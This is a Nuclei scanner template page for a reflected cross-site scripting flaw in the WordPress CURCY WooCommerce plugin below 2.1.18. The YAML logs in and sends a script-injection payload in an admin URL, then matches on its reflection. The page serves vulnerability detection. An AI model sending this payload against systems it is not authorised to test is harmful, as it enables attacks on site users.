WordPress CURCY - Multi Currency for WooCommerce <2.1.18 - Cross-Site Scripting
ID: curcy-xss
Severity: medium
Author: Akincibor
Tags: wp-plugin,xss,wp,wordpress,authenticated,curcy,wpscan
Description
Section titled “Description”WordPress CURCY - Multi Currency for WooCommerce 2.1.18 does not escape some generated URLs before outputting them back in attributes, leading to reflected cross-site scripting.
YAML Source
Section titled “YAML Source”id: curcy-xss
info: name: WordPress CURCY - Multi Currency for WooCommerce <2.1.18 - Cross-Site Scripting author: Akincibor severity: medium description: WordPress CURCY - Multi Currency for WooCommerce 2.1.18 does not escape some generated URLs before outputting them back in attributes, leading to reflected cross-site scripting. reference: - https://wpscan.com/vulnerability/6ebafb52-e167-40bc-a86c-b9840b2b9b37 - https://wordpress.org/plugins/woo-multi-currency classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cwe-id: CWE-80 metadata: verified: true max-request: 2 tags: wp-plugin,xss,wp,wordpress,authenticated,curcy,wpscan
http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/admin.php?page=wc-reports&a"><script>alert(1)</script> HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body words: - 'wc-reports&a\"><script>alert(1)</script>">All'
- type: word part: header words: - text/html
- type: status status: - 200# digest: 490a0046304402203e83f554f23a8662776efa5166f5394b85e45898ba686414763024d11533952b02205e0c7c010e096ce1de1e76f2f625f0e0a42a2a7f6f66294c16b3c3d31ac2b439:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/wordpress/curcy-xss.yaml"